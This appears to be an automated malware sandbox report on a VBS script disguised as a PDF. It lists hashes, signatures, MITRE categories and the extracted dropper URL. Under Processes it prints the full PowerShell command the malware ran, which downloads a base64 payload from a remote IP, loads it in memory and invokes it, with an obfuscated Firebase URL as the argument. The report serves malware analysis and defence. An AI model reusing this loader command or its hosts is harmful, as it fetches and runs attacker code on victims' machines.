Analysis

  • max time kernel
    41s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    30-09-2022 14:41

General

  • Target

    URFT06GSBAWRP_001_PDF/RQK02HVBPO_002_PDF.vbs

  • Size

    219KB

  • MD5

    86d9cdbe85e0b345c00063cb59efda75

  • SHA1

    6990625fff03cdc505a7c9a224c39fb9c1b1ab80

  • SHA256

    541752eae29c171bb8ab3f5851b6f58ba58035298b8781990998d22cd4982f6e

  • SHA512

    0f39d5b741cb5fc822f17306537a4659c5ff191f18ef47e18aa3f604eb9d4598f1c01316068285531916a57bd0410b27fd8d44adb3bda41ee691098cd5b1bc2f

  • SSDEEP

    48:DVK0hbQvuivLvyvTxYvsvuiv7vu2vJR2vFvvvfv1KvFvDv2UfHvrvUvgYvc2vGgu:xKWdUIlVc8WGvXimF

Score
10/10

Malware Config

Extracted

Language ps1
Deobfuscated
URLs
ps1.dropper

http://20.7.14.99/dll/dll_ink.pdf

Signatures

  • Blocklisted process makes network request ⋅ 1 IoCs
  • Enumerates physical storage devices ⋅ 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses ⋅ 1 IoCs
  • Suspicious use of AdjustPrivilegeToken ⋅ 1 IoCs
  • Suspicious use of WriteProcessMemory ⋅ 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\URFT06GSBAWRP_001_PDF\RQK02HVBPO_002_PDF.vbs"
    Suspicious use of WriteProcessMemory
    PID:1832
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('9a82ea0d2fb5-1179-4854-75ce-8a89ca37=nekot&aidem=tla?txt.cnysay/o/moc.topsppa.483ca-dpoj/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1728

Network

MITRE ATT&CK Matrix

Collection

    Command and Control

      Credential Access

        Defense Evasion

          Execution

            Exfiltration

              Impact

                Initial Access

                  Lateral Movement

                    Persistence

                      Privilege Escalation

                        Replay Monitor

                        00:00 00:00

                        Downloads

                        • memory/1728-55-0x0000000000000000-mapping.dmp
                        • memory/1728-57-0x000007FEF4940000-0x000007FEF5363000-memory.dmp
                        • memory/1728-58-0x000007FEF3DE0000-0x000007FEF493D000-memory.dmp
                        • memory/1728-59-0x0000000002414000-0x0000000002417000-memory.dmp
                        • memory/1728-60-0x000000000241B000-0x000000000243A000-memory.dmp
                        • memory/1728-61-0x0000000002414000-0x0000000002417000-memory.dmp
                        • memory/1728-62-0x000000000241B000-0x000000000243A000-memory.dmp
                        • memory/1832-54-0x000007FEFC341000-0x000007FEFC343000-memory.dmp